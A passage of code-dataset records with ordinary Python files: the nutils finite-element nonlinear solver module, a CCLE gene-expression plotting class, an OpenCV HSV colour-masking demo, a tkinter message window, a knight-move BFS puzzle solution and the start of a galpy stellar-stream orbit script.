OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n\"\"\"\nThe solver module defines the :class:`Integral` class, which represents an\nunevaluated integral. This is useful for fully automated solution procedures\nsuch as Newton, that require functional derivatives of an entire functional.\n\nTo demonstrate this consider the following setup:\n\n>>> from nutils import mesh, function, solver\n>>> ns = function.Namespace()\n>>> domain, ns.x = mesh.rectilinear([4,4])\n>>> ns.basis = domain.basis('spline', degree=2)\n>>> cons = domain.boundary['left,top'].project(0, onto=ns.basis, geometry=ns.x, ischeme='gauss4')\nproject > constrained 11/36 dofs, error 0.00e+00/area\n>>> ns.u = 'basis_n ?lhs_n'\n\nFunction ``u`` represents an element from the discrete space but cannot not\nevaluated yet as we did not yet establish values for ``?lhs``. It can,\nhowever, be used to construct a residual functional ``res``. Aiming to solve\nthe Poisson problem ``u_,kk = f`` we define the residual functional ``res = v,k\nu,k + v f`` and solve for ``res == 0`` using ``solve_linear``:\n\n>>> res = domain.integral('basis_n,i u_,i + basis_n' @ ns, geometry=ns.x, degree=2)\n>>> lhs = solver.solve_linear('lhs', residual=res, constrain=cons)\nsolve > solver returned with residual ...\n\nThe coefficients ``lhs`` represent the solution to the Poisson problem.\n\nIn addition to ``solve_linear`` the solver module defines ``newton`` and\n``pseudotime`` for solving nonlinear problems, as well as ``impliciteuler`` for\ntime dependent problems.\n\"\"\"\n\nfrom . import function, cache, log, util, numeric\nimport numpy, itertools, functools, numbers, collections\n\n\nclass Integral:\n '''Postponed integral, used for derivative purposes'''\n\n def __init__(self, integrands):\n self._integrands = util.hashlessdict((di, f.simplified) for di, f in integrands)\n shapes = {integrand.shape for integrand in self._integrands.values()}\n assert len(shapes) == 1, 'incompatible shapes: {}'.format(' != '.join(str(shape) for shape in shapes))\n self.shape, = shapes\n\n @classmethod\n def multieval(cls, *integrals, fcache=None, arguments=None):\n assert all(isinstance(integral, cls) for integral in integrals)\n if fcache is None:\n fcache = cache.WrapperCache()\n gather = util.hashlessdict()\n for iint, integral in enumerate(integrals):\n for di in integral._integrands:\n gather.setdefault(di, []).append(iint)\n retvals = [None] * len(integrals)\n for (domain, ischeme), iints in gather.items():\n for iint, retval in zip(iints, domain.integrate([integrals[iint]._integrands[domain, ischeme] for iint in iints], ischeme=ischeme, fcache=fcache, arguments=arguments)):\n if retvals[iint] is None:\n retvals[iint] = retval\n else:\n retvals[iint] += retval\n return retvals\n\n def eval(self, **kwargs):\n retval, = self.multieval(self, **kwargs)\n return retval\n\n def derivative(self, target):\n argshape = self._argshape(target)\n arg = function.Argument(target, argshape)\n seen = {}\n return Integral([di, function.derivative(integrand, var=arg, seen=seen)] for di, integrand in self._integrands.items())\n\n def replace(self, arguments):\n return Integral([di, function.replace_arguments(integrand, arguments)] for di, integrand in self._integrands.items())\n\n def contains(self, name):\n try:\n self._argshape(name)\n except KeyError:\n 
return False\n else:\n return True\n\n def __add__(self, other):\n if not isinstance(other, Integral):\n return NotImplemented\n assert self.shape == other.shape\n integrands = self._integrands.copy()\n for di, integrand in other._integrands.items():\n try:\n integrands[di] += integrand\n except KeyError:\n integrands[di] = integrand\n return Integral(integrands.items())\n\n def __neg__(self):\n return Integral([di, -integrand] for di, integrand in self._integrands.items())\n\n def __sub__(self, other):\n return self + (-other)\n\n def __mul__(self, other):\n if not isinstance(other, numbers.Number):\n return NotImplemented\n return Integral([di, integrand * other] for di, integrand in self._integrands.items())\n\n __rmul__ = __mul__\n\n def __truediv__(self, other):\n if not isinstance(other, numbers.Number):\n return NotImplemented\n return self.__mul__(1/other)\n\n def _argshape(self, name):\n assert isinstance(name, str)\n shapes = {func.shape[:func.ndim-func._nderiv]\n for func in function.Tuple(self._integrands.values()).dependencies\n if isinstance(func, function.Argument) and func._name == name}\n if not shapes:\n raise KeyError(name)\n assert len(shapes) == 1, 'inconsistent shapes for argument {!r}'.format(name)\n shape, = shapes\n return shape\n\n\nclass ModelError(Exception): pass\n\n\ndef solve_linear(target, residual, constrain=None, *, arguments=None, **solveargs):\n '''solve linear problem\n\n Parameters\n ----------\n target : :class:`str`\n Name of the target: a :class:`nutils.function.Argument` in ``residual``.\n residual : Integral\n Residual integral, depends on ``target``\n constrain : float vector\n Defines the fixed entries of the coefficient vector\n arguments : :class:`collections.abc.Mapping`\n Defines the values for :class:`nutils.function.Argument` objects in\n `residual`. The ``target`` should not be present in ``arguments``.\n Optional.\n\n Returns\n -------\n vector\n Array of ``target`` values for which ``residual == 0``'''\n\n jacobian = residual.derivative(target)\n if jacobian.contains(target):\n raise ModelError('problem is not linear')\n assert target not in (arguments or {}), '`target` should not be defined in `arguments`'\n argshape = residual._argshape(target)\n arguments = collections.ChainMap(arguments or {}, {target: numpy.zeros(argshape)})\n res, jac = Integral.multieval(residual, jacobian, arguments=arguments)\n return jac.solve(-res, constrain=constrain, **solveargs)\n\n\ndef solve(gen_lhs_resnorm, tol=1e-10, maxiter=numpy.inf):\n '''execute nonlinear solver\n\n Iterates over nonlinear solver until tolerance is reached. 
Example::\n\n lhs = solve(newton(target, residual), tol=1e-5)\n\n Parameters\n ----------\n gen_lhs_resnorm : generator\n Generates (lhs, resnorm) tuples\n tol : float\n Target residual norm\n maxiter : int\n Maximum number of iterations\n\n Returns\n -------\n vector\n Coefficient vector that corresponds to a smaller than ``tol`` residual.\n '''\n\n try:\n lhs, resnorm = next(gen_lhs_resnorm)\n resnorm0 = resnorm\n inewton = 0\n while resnorm > tol:\n if inewton >= maxiter:\n raise ModelError('tolerance not reached in {} iterations'.format(maxiter))\n with log.context('iter {0} ({1:.0f}%)'.format(inewton, 100 * numpy.log(resnorm0/resnorm) / numpy.log(resnorm0/tol))):\n log.info('residual: {:.2e}'.format(resnorm))\n lhs, resnorm = next(gen_lhs_resnorm)\n inewton += 1\n except StopIteration:\n raise ModelError('generator stopped before reaching target tolerance')\n else:\n log.info('tolerance reached in {} iterations with residual {:.2e}'.format(inewton, resnorm))\n return lhs\n\n\ndef withsolve(f):\n '''add a .solve method to (lhs,resnorm) iterators\n\n Introduces the convenient form::\n\n newton(target, residual).solve(tol)\n\n Shorthand for::\n\n solve(newton(target, residual), tol)\n '''\n\n @functools.wraps(f, updated=())\n class wrapper:\n def __init__(self, *args, **kwargs):\n self.iter = f(*args, **kwargs)\n def __next__(self):\n return next(self.iter)\n def __iter__(self):\n return self.iter\n def solve(self, *args, **kwargs):\n return solve(self.iter, *args, **kwargs)\n return wrapper\n\n\n@withsolve\ndef newton(target, residual, jacobian=None, lhs0=None, constrain=None, nrelax=numpy.inf, minrelax=.1, maxrelax=.9, rebound=2**.5, *, arguments=None, **solveargs):\n '''iteratively solve nonlinear problem by gradient descent\n\n Generates targets such that residual approaches 0 using Newton procedure with\n line search based on a residual integral. Suitable to be used inside\n ``solve``.\n\n An optimal relaxation value is computed based on the following cubic\n assumption::\n\n | res(lhs + r * dlhs) |^2 = A + B * r + C * r^2 + D * r^3\n\n where ``A``, ``B``, ``C`` and ``D`` are determined based on the current and\n updated residual and tangent.\n\n Parameters\n ----------\n target : :class:`str`\n Name of the target: a :class:`nutils.function.Argument` in ``residual``.\n residual : Integral\n lhs0 : vector\n Coefficient vector, starting point of the iterative procedure.\n constrain : boolean or float vector\n Equal length to ``lhs0``, masks the free vector entries as ``False``\n (boolean) or NaN (float). In the remaining positions the values of\n ``lhs0`` are returned unchanged (boolean) or overruled by the values in\n `constrain` (float).\n nrelax : int\n Maximum number of relaxation steps before proceding with the updated\n coefficient vector (by default unlimited).\n minrelax : float\n Lower bound for the relaxation value, to force re-evaluating the\n functional in situation where the parabolic assumption would otherwise\n result in unreasonably small steps.\n maxrelax : float\n Relaxation value below which relaxation continues, unless ``nrelax`` is\n reached; should be a value less than or equal to 1.\n rebound : float\n Factor by which the relaxation value grows after every update until it\n reaches unity.\n arguments : :class:`collections.abc.Mapping`\n Defines the values for :class:`nutils.function.Argument` objects in\n `residual`. 
The ``target`` should not be present in ``arguments``.\n Optional.\n\n Yields\n ------\n vector\n Coefficient vector that approximates residual==0 with increasing accuracy\n '''\n\n assert target not in (arguments or {}), '`target` should not be defined in `arguments`'\n argshape = residual._argshape(target)\n\n if lhs0 is None:\n lhs0 = numpy.zeros(residual.shape)\n else:\n assert numeric.isarray(lhs0) and lhs0.dtype == float and lhs0.shape == residual.shape, 'invalid lhs0 argument'\n\n if constrain is None:\n constrain = numpy.zeros(residual.shape, dtype=bool)\n else:\n assert numeric.isarray(constrain) and constrain.dtype in (bool,float) and constrain.shape == residual.shape, 'invalid constrain argument'\n if constrain.dtype == float:\n lhs0 = numpy.choose(numpy.isnan(constrain), [constrain, lhs0])\n constrain = ~numpy.isnan(constrain)\n\n if jacobian is None:\n jacobian = residual.derivative(target)\n\n if not jacobian.contains(target):\n log.info('problem is linear')\n res, jac = Integral.multieval(residual, jacobian, arguments=collections.ChainMap(arguments or {}, {target: numpy.zeros(argshape)}))\n lhs = jac.solve(-res, lhs0=lhs0, constrain=constrain, **solveargs)\n yield lhs, 0\n return\n\n lhs = lhs0.copy()\n fcache = cache.WrapperCache()\n res, jac = Integral.multieval(residual, jacobian, fcache=fcache, arguments=collections.ChainMap(arguments or {}, {target: lhs}))\n relax = 1\n while True:\n resnorm = numpy.linalg.norm(res[~constrain])\n yield lhs, resnorm\n dlhs = -jac.solve(res, constrain=constrain, **solveargs)\n relax = min(relax * rebound, 1)\n for irelax in itertools.count():\n res, jac = Integral.multieval(residual, jacobian, fcache=fcache, arguments=collections.ChainMap(arguments or {}, {target: lhs+relax*dlhs}))\n newresnorm = numpy.linalg.norm(res[~constrain])\n if irelax >= nrelax:\n if newresnorm > resnorm:\n log.warning('failed to decrease residual')\n return\n break\n if not numpy.isfinite(newresnorm):\n log.info('failed to evaluate residual ({})'.format(newresnorm))\n newrelax = 0 # replaced by minrelax later\n else:\n r0 = resnorm**2\n d0 = -2 * r0\n r1 = newresnorm**2\n d1 = 2 * numpy.dot(jac.matvec(dlhs)[~constrain], res[~constrain])\n log.info('line search: 0[{}]{} {}creased by {:.0f}%'.format('---+++' if d1 > 0 else '--++--' if r1 > r0 else '------', round(relax,5), 'in' if newresnorm > resnorm else 'de', 100*abs(newresnorm/resnorm-1)))\n if r1 <= r0 and d1 <= 0:\n break\n D = 2*r0 - 2*r1 + d0 + d1\n if D > 0:\n C = 3*r1 - 3*r0 - 2*d0 - d1\n newrelax = (numpy.sqrt(C**2-3*d0*D) - C) / (3*D)\n log.info('minimum based on 3rd order estimation: {:.3f}'.format(newrelax))\n else:\n C = r1 - r0 - d0\n # r1 > r0 => C > 0\n # d1 > 0 => C = r1 - r0 - d0/2 - d0/2 > r1 - r0 - d0/2 - d1/2 = -D/2 > 0\n newrelax = -.5 * d0 / C\n log.info('minimum based on 2nd order estimation: {:.3f}'.format(newrelax))\n if newrelax > maxrelax:\n break\n relax *= max(newrelax, minrelax)\n lhs += relax * dlhs\n\n\n@withsolve\ndef pseudotime(target, residual, inertia, timestep, lhs0, residual0=None, constrain=None, *, arguments=None, **solveargs):\n '''iteratively solve nonlinear problem by pseudo time stepping\n\n Generates targets such that residual approaches 0 using hybrid of Newton and\n time stepping. Requires an inertia term and initial timestep. 
Suitable to be\n used inside ``solve``.\n\n Parameters\n ----------\n target : :class:`str`\n Name of the target: a :class:`nutils.function.Argument` in ``residual``.\n residual : Integral\n inertia : Integral\n timestep : float\n Initial time step, will scale up as residual decreases\n lhs0 : vector\n Coefficient vector, starting point of the iterative procedure.\n constrain : boolean or float vector\n Equal length to ``lhs0``, masks the free vector entries as ``False``\n (boolean) or NaN (float). In the remaining positions the values of\n ``lhs0`` are returned unchanged (boolean) or overruled by the values in\n `constrain` (float).\n arguments : :class:`collections.abc.Mapping`\n Defines the values for :class:`nutils.function.Argument` objects in\n `residual`. The ``target`` should not be present in ``arguments``.\n Optional.\n\n Yields\n ------\n vector, float\n Tuple of coefficient vector and residual norm\n '''\n\n assert target not in (arguments or {}), '`target` should not be defined in `arguments`'\n\n jacobian0 = residual.derivative(target)\n jacobiant = inertia.derivative(target)\n if residual0 is not None:\n residual += residual0\n\n if constrain is None:\n constrain = numpy.zeros(residual.shape, dtype=bool)\n else:\n assert numeric.isarray(constrain) and constrain.dtype in (bool,float) and constrain.shape == residual.shape, 'invalid constrain argument'\n if constrain.dtype == float:\n lhs0 = numpy.choose(numpy.isnan(constrain), [constrain, lhs0])\n constrain = ~numpy.isnan(constrain)\n\n argshape = residual._argshape(target)\n assert len(argshape) == 1\n lhs = lhs0.copy()\n fcache = cache.WrapperCache()\n res, jac = Integral.multieval(residual, jacobian0+jacobiant/timestep, fcache=fcache, arguments=collections.ChainMap(arguments or {}, {target: lhs}))\n resnorm = resnorm0 = numpy.linalg.norm(res[~constrain])\n while True:\n yield lhs, resnorm\n lhs -= jac.solve(res, constrain=constrain, **solveargs)\n thistimestep = timestep * (resnorm0/resnorm)\n log.info('timestep: {:.0e}'.format(thistimestep))\n res, jac = Integral.multieval(residual, jacobian0+jacobiant/thistimestep, fcache=fcache, arguments=collections.ChainMap(arguments or {}, {target: lhs}))\n resnorm = numpy.linalg.norm(res[~constrain])\n\n\ndef thetamethod(target, residual, inertia, timestep, lhs0, theta, target0='_thetamethod_target0', constrain=None, newtontol=1e-10, *, arguments=None, **newtonargs):\n '''solve time dependent problem using the theta method\n\n Parameters\n ----------\n target : :class:`str`\n Name of the target: a :class:`nutils.function.Argument` in ``residual``.\n residual : Integral\n inertia : Integral\n timestep : float\n Initial time step, will scale up as residual decreases\n lhs0 : vector\n Coefficient vector, starting point of the iterative procedure.\n theta : float\n Theta value (theta=1 for implicit Euler, theta=0.5 for Crank-Nicolson)\n residual0 : Integral\n Optional additional residual component evaluated in previous timestep\n constrain : boolean or float vector\n Equal length to ``lhs0``, masks the free vector entries as ``False``\n (boolean) or NaN (float). In the remaining positions the values of\n ``lhs0`` are returned unchanged (boolean) or overruled by the values in\n `constrain` (float).\n newtontol : float\n Residual tolerance of individual timesteps\n arguments : :class:`collections.abc.Mapping`\n Defines the values for :class:`nutils.function.Argument` objects in\n `residual`. 
The ``target`` should not be present in ``arguments``.\n Optional.\n\n Yields\n ------\n vector\n Coefficient vector for all timesteps after the initial condition.\n '''\n\n assert target != target0, '`target` should not be equal to `target0`'\n assert target not in (arguments or {}), '`target` should not be defined in `arguments`'\n assert target0 not in (arguments or {}), '`target0` should not be defined in `arguments`'\n lhs = lhs0\n res0 = residual * theta + inertia / timestep\n res1 = residual * (1-theta) - inertia / timestep\n res = res0 + res1.replace({target: function.Argument(target0, lhs.shape)})\n jac = res.derivative(target)\n while True:\n yield lhs\n lhs = newton(target, residual=res, jacobian=jac, lhs0=lhs, constrain=constrain, arguments=collections.ChainMap(arguments or {}, {target0: lhs}), **newtonargs).solve(tol=newtontol)\n\n\nimpliciteuler = functools.partial(thetamethod, theta=1)\ncranknicolson = functools.partial(thetamethod, theta=0.5)\n\n\n@log.title\ndef optimize(target, functional, droptol=None, lhs0=None, constrain=None, newtontol=None, *, arguments=None):\n '''find the minimizer of a given functional\n\n Parameters\n ----------\n target : :class:`str`\n Name of the target: a :class:`nutils.function.Argument` in ``residual``.\n functional : scalar Integral\n The functional the should be minimized by varying target\n droptol : :class:`float`\n Threshold for leaving entries in the return value at NaN if they do not\n contribute to the value of the functional.\n lhs0 : vector\n Coefficient vector, starting point of the iterative procedure (if\n applicable).\n constrain : boolean or float vector\n Equal length to ``lhs0``, masks the free vector entries as ``False``\n (boolean) or NaN (float). In the remaining positions the values of\n ``lhs0`` are returned unchanged (boolean) or overruled by the values in\n `constrain` (float).\n newtontol : float\n Residual tolerance of Newton procedure (if applicable)\n\n Yields\n ------\n vector\n Coefficient vector corresponding to the functional optimum\n '''\n\n assert target not in (arguments or {}), '`target` should not be defined in `arguments`'\n assert len(functional.shape) == 0, 'functional should be scalar'\n argshape = functional._argshape(target)\n if lhs0 is None:\n lhs0 = numpy.zeros(argshape)\n else:\n assert numeric.isarray(lhs0) and lhs0.dtype == float and lhs0.shape == argshape, 'invalid lhs0 argument'\n if constrain is None:\n constrain = numpy.zeros(argshape, dtype=bool)\n else:\n assert numeric.isarray(constrain) and constrain.dtype in (bool,float) and constrain.shape == argshape, 'invalid constrain argument'\n if constrain.dtype == float:\n lhs0 = numpy.choose(numpy.isnan(constrain), [constrain, lhs0])\n constrain = ~numpy.isnan(constrain)\n residual = functional.derivative(target)\n jacobian = residual.derivative(target)\n f0, res, jac = Integral.multieval(functional, residual, jacobian, arguments=collections.ChainMap(arguments or {}, {target: lhs0}))\n freezedofs = constrain if droptol is None else constrain | ~jac.rowsupp(droptol)\n log.info('optimizing for {}/{} degrees of freedom'.format(len(res)-freezedofs.sum(), len(res)))\n lhs = lhs0 - jac.solve(res, constrain=freezedofs) # residual(lhs0) + jacobian(lhs0) dlhs = 0\n if not jacobian.contains(target): # linear: functional(lhs0+dlhs) = functional(lhs0) + residual(lhs0) dlhs + .5 dlhs jacobian(lhs0) dlhs\n value = f0 + .5 * res.dot(lhs-lhs0)\n else: # nonlinear\n assert newtontol is not None, 'newton tolerance `newtontol` must be specified for nonlinear 
problems'\n lhs = newton(target, residual, lhs0=lhs, constrain=freezedofs, arguments=arguments).solve(newtontol)\n value = functional.eval(arguments=collections.ChainMap(arguments or {}, {target: lhs}))\n assert numpy.isfinite(lhs).all(), 'optimization failed (forgot droptol?)'\n log.info('optimum: {:.2e}'.format(value))\n lhs[freezedofs & ~constrain] = numpy.nan\n return lhs\n","sub_path":"nutils/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":21800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"243838302","text":"import os\nimport re\nimport math\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom cycler import cycler\n\nclass CancerCellLineEncyclopedia(object):\n \"\"\"https://portals.broadinstitute.org/ccle\n \"\"\"\n def __init__(self, gene_names, \n expression = 'https://data.broadinstitute.org/ccle/CCLE_RNAseq_rsem_genes_tpm_20180929.txt.gz', \n annotations = 'https://data.broadinstitute.org/ccle/Cell_lines_annotations_20181226.txt', \n counts = 'https://data.broadinstitute.org/ccle/CCLE_RNAseq_genes_counts_20180929.gct.gz', \n cell_lines=[], ccle_names=[]):\n \n self.gene_names = gene_names\n self.cell_lines = cell_lines\n self.ccle_names = ccle_names\n \n self.gene_expression_data = pd.read_table(expression,index_col=0)\n\n self.annotations = pd.read_table(annotations)\n\n self.counts = pd.read_table(counts,header=2, usecols=range(2))\n\n self.annotations_name = set(self.annotations.Name)\n self.annotations_ccle_id = set(self.annotations.CCLE_ID)\n self.counts_description = set(self.counts.Description)\n\n def _gene2id(self, gene):\n if gene not in self.counts_description:\n print(\"gene '{}' does not exist.\\n\".format(gene))\n return False\n else:\n gene_id = self.counts.at[\n list(self.counts.Description).index(gene), 'Name'\n ]\n return gene_id\n \n def _id2gene(self, gene_id):\n gene = self.counts.at[\n list(self.counts.Name).index(gene_id), 'Description'\n ]\n return gene\n\n def _cell2id(self, cell):\n if cell not in self.annotations_name:\n raise ValueError(cell)\n else:\n ccle_id = self.annotations.at[\n list(self.annotations.Name).index(cell), 'CCLE_ID'\n ]\n return ccle_id\n\n def _id2cell(self, ccle_id):\n if ccle_id not in self.annotations_ccle_id:\n raise ValueError(ccle_id)\n else:\n cell = self.annotations.at[\n list(self.annotations.CCLE_ID).index(ccle_id), 'Name'\n ]\n try:\n if math.isnan(float(cell)):\n cell = re.findall('(.*?)_', ccle_id)[0]\n except ValueError:\n pass\n return cell\n\n def _get_gene_id(self):\n gene_ids = []\n for gene in self.gene_names:\n a_gene_id = self._gene2id(gene)\n if not a_gene_id:\n pass\n else:\n gene_ids.append(a_gene_id)\n return gene_ids\n \n def _get_ccle_id(self):\n ccle_ids = []\n for cell in self.cell_lines:\n ccle_ids.append(self._cell2id(cell))\n return ccle_ids\n\n def _extract(self):\n gene_ids = self._get_gene_id()\n ccle_ids = self._get_ccle_id() \\\n if len(self.ccle_names) < len(self.cell_lines) else self.ccle_names\n data = self.gene_expression_data.loc[gene_ids, ccle_ids]\n data.index.name = None\n data.rename(\n index=lambda x: self._id2gene(x),\n columns=lambda x: self._id2cell(x),\n inplace=True\n )\n data.to_csv('tpm_values.csv')\n return data\n\n def to_expression(self):\n if not self.cell_lines and not self.ccle_names:\n raise ValueError('cell_lines or ccle_names must be filled in.')\n os.makedirs('./expression', exist_ok=True)\n data = self._extract()\n # rcParams\n plt.rcParams['font.family'] = 
'Arial'\n plt.rcParams['font.size'] = 28\n plt.rcParams['axes.linewidth'] = 2\n plt.rcParams['xtick.major.width'] = 2\n plt.rcParams['ytick.major.width'] = 2\n plt.rcParams['axes.prop_cycle'] = cycler(\n color=[\n '#4E79A7', '#F28E2B', '#E15759', '#76B7B2','#59A14E',\n '#EDC949','#B07AA2','#FF9DA7','#9C755F','#BAB0AC'\n ]\n )\n for gene in self.gene_names:\n if gene in self.counts_description:\n ax = data.loc[gene].plot.bar(\n figsize=(\n 2*max(len(self.cell_lines), len(self.ccle_names)), 6\n ), fontsize=28, title=gene, # r'$\\it{'+gene+'}$'\n )\n ax.set_ylabel('TPM')\n sns.despine()\n plt.savefig(\n './expression/{}.pdf'.format(gene), bbox_inches='tight'\n )\n plt.close()\n \n def to_gene_summary(self):\n with open('gene_summary.md', mode='w') as f:\n f.write('|gene_name|gene_id|GeneCards_URL|\\n'\\\n '|---------|-------|-------------|\\n')\n for gene in self.gene_names:\n if gene in self.counts_description:\n gene_id = self._gene2id(gene)\n gene_cards_url = (\n 'https://www.genecards.org/'\\\n 'cgi-bin/carddisp.pl?gene='+gene\n )\n f.write(\n '|'+gene+'|'+gene_id+'|'+gene_cards_url+'|\\n'\n )","sub_path":"ccle_processing.py","file_name":"ccle_processing.py","file_ext":"py","file_size_in_byte":5204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"620812408","text":"# find_blue_in_image.py\n# Detect pixels similar to a prescribed color.\n# This can be done usg HSV color space.\n\nimport cv2\nimport numpy as np \n\nimg = cv2.imread('input_image.jpg', 1) \n# 1 : import image in color\n\n# Convert to different color space\nimg_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\nprint(type(img_hsv))\nprint(img_hsv.shape)\nprint(img_hsv.dtype)\n\ngreen = np.uint8([[[0, 255, 0]]]) # 3D array\ngreen_hsv = cv2.cvtColor(green, cv2.COLOR_BGR2HSV)\nh = green_hsv[0,0,0]\nprint('Green in HSV color space:', green_hsv)\nprint('Hue = ', h) # see that h = 120\n\n# lower = np.array([90, 50, 22])\n# upper = np.array([180, 255, 90])\nlower = np.array([h-20, 50, 50])\nupper = np.array([h+20, 255, 255])\nprint('lower = ', lower)\nprint('upper = ', upper)\n\n# quit()\n\n# Determine binary mask\ngreen_mask = cv2.inRange(img_hsv, lower, upper)\n\n# Apply mask to color image\noutput = cv2.bitwise_and(img, img, mask = green_mask)\n\n# Show images:\ncv2.imshow('Original image', img)\ncv2.imshow('Mask', green_mask)\ncv2.imshow('Segmented image', output)\n\nprint('Switch to images. 
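# OpenCV stores 8-bit hue in [0, 179], so a window like [h-20, h+20] can wrap
# past zero for reddish colors. A hedged sketch of the usual two-mask fix
# (hue_mask is an illustrative helper, not part of the script above):
import cv2
import numpy as np

def hue_mask(img_hsv, h, spread=20):
    if h - spread < 0:  # window wraps below hue 0
        m1 = cv2.inRange(img_hsv, np.array([0, 50, 50]), np.array([h + spread, 255, 255]))
        m2 = cv2.inRange(img_hsv, np.array([180 + h - spread, 50, 50]), np.array([179, 255, 255]))
        return cv2.bitwise_or(m1, m2)
    return cv2.inRange(img_hsv, np.array([h - spread, 50, 50]), np.array([h + spread, 255, 255]))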
Then press any key to stop')\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n# Write the image to a file\n# cv2.imwrite('tiger_mask.jpg', green_mask) \n# cv2.imwrite('tiger_green.jpg', output) \ncv2.imwrite('mask_image.jpg', green_mask) \ncv2.imwrite('detected_pixels.jpg', output) \n\n\n# Reference\n# http://docs.opencv.org/3.2.0/df/d9d/tutorial_py_colorspaces.html\n","sub_path":"Module 8/demo22ex3.py","file_name":"demo22ex3.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"369369863","text":"import tkinter as tk\nfrom tkinter import messagebox\nfrom robot import create_block_hola, create_block_medio, create_block_chau, printer\n\n\n\nclass Mainframe(tk.Frame):\n # Mainframe contains the widgets\n # More advanced programs may have multiple frames\n # or possibly a grid of subframes\n \n def __init__(self,master,*args,**kwargs):\n # *args packs positional arguments into tuple args\n # **kwargs packs keyword arguments into dict kwargs\n \n # initialise base class\n tk.Frame.__init__(self,master,*args,**kwargs)\n # in this case the * an ** operators unpack the parameters\n \n # put your widgets here\n #self.counter_message = tk.IntVar()\n tk.Label(self,textvariable = \"Prueba calyx ejecutable v1\").grid(row = 0,column = 0)\n tk.Button(self,text =\"Mensaje\",command = self.do_mensaje).grid(row = 1,column = 0)\n\n def do_mensaje(self):\n messagebox.showinfo(message=\"Hola mundo\", title=\"Calyx prueba\")\n \nclass App(tk.Tk):\n def __init__(self):\n tk.Tk.__init__(self)\n \n # set the title bar text\n self.title('Calyx prueba')\n # Make sure app window is big enough to show title \n self.geometry('300x100')\n \n # create and pack a Mainframe window\n Mainframe(self).pack()\n \n # now start\n self.mainloop()\n \n# create an App object\n# it will run itself\nApp()","sub_path":"qside/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"644830906","text":"import sys\nreadl = sys.stdin.readline\n\ndx = [-2, -1, 1, 2, 2, 1, -1, -2]\ndy = [1, 2, 2, 1, -1, -2, -2, -1]\n\nt = int(readl())\nfor _ in range(t):\n l = int(readl())\n current = list(map(int, readl().split()))\n target = list(map(int, readl().split()))\n \n queue = [(current[0], current[1], 0)]\n index = 0\n \n visited = [[False for _ in range(l)] for _ in range(l)]\n visited[current[0]][current[1]] = True\n\n result = 0\n while index < len(queue):\n node = queue[index]\n index += 1\n\n if node[0] == target[0] and node[1] == target[1]:\n result = node[2]\n break\n \n for i in range(8):\n nx = node[0] + dx[i]\n ny = node[1] + dy[i]\n nc = node[2] + 1\n\n if not (0 <= nx < l and 0 <= ny < l):\n continue\n if visited[nx][ny]:\n continue\n\n visited[nx][ny] = True\n queue.append((nx, ny, nc))\n \n print(result)\n","sub_path":"Python/BOJ/BFS/7562.py","file_name":"7562.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"25359557","text":"import matplotlib\nmatplotlib.use('agg')\nimport numpy as np\nfrom galpy.potential import LogarithmicHaloPotential\nfrom galpy.orbit import Orbit\nfrom galpy.potential import MWPotential2014, turn_physical_off, MiyamotoNagaiPotential, plotDensities,evaluateDensities\nfrom galpy.util import bovy_conversion, save_pickles, bovy_coords, bovy_plot\nfrom galpy.df import streamdf,streamgapdf \nfrom galpy.util 
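# The same knight-move search as in 7562.py above, sketched with
# collections.deque so popped entries are released instead of the queue list
# growing for the whole run:
from collections import deque

def knight_bfs(l, start, target):
    dx = [-2, -1, 1, 2, 2, 1, -1, -2]
    dy = [1, 2, 2, 1, -1, -2, -2, -1]
    queue = deque([(start[0], start[1], 0)])
    visited = [[False] * l for _ in range(l)]
    visited[start[0]][start[1]] = True
    while queue:
        x, y, c = queue.popleft()
        if (x, y) == (target[0], target[1]):
            return c
        for i in range(8):
            nx, ny = x + dx[i], y + dy[i]
            if 0 <= nx < l and 0 <= ny < l and not visited[nx][ny]:
                visited[nx][ny] = True
                queue.append((nx, ny, c + 1))
    return -1  # unreachable (cannot happen on a connected board)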
import bovy_coords, bovy_conversion\nfrom galpy import potential\nfrom matplotlib import cm, pyplot\nimport SCFbar_util\nfrom astropy import units\nimport astropy.units as u\nimport streamspraydf\nimport argparse\nfrom galpy.potential import DehnenBarPotential\nfrom galpy.potential import DehnenSmoothWrapperPotential as DehnenWrap\n\ndef galcencyl_to_lbd(R,phi,Z,degree=True):\n xyz=bovy_coords.galcencyl_to_XYZ(R,phi,Z)\n lbd=bovy_coords.XYZ_to_lbd(xyz[0],xyz[1],xyz[2],degree=degree)\n return lbd[0], lbd[1], lbd[2]\n\nparser = argparse.ArgumentParser(description='My app description')\nparser.add_argument('-o', '--output', help='Path to output file')\nargs = parser.parse_args()\n\n\nro=8.\nvo=220.\n\ndef galcencyl_to_lbd(R,phi,Z,degree=True):\n xyz=bovy_coords.galcencyl_to_XYZ(R,phi,Z)\n lbd=bovy_coords.XYZ_to_lbd(xyz[0],xyz[1],xyz[2],degree=degree)\n return lbd[0], lbd[1], lbd[2]\n \nMbar=10**10.\npat_speed=40.\nang=27.\n\nAc,As=SCFbar_util.compute_Acos_Asin()\nbarpot,nobarpot=SCFbar_util.Particle_Spray_MWPotentialSCFbar(mbar=Mbar,Acos=Ac,Asin=As,t_on=-2.)\n\np5= Orbit([229.018,-0.124,23.2,-2.296,-2.257,-58.7],radec=True,ro=ro,vo=vo,solarmotion=[-11.1,24.,7.25])\n\n#convert to galpy 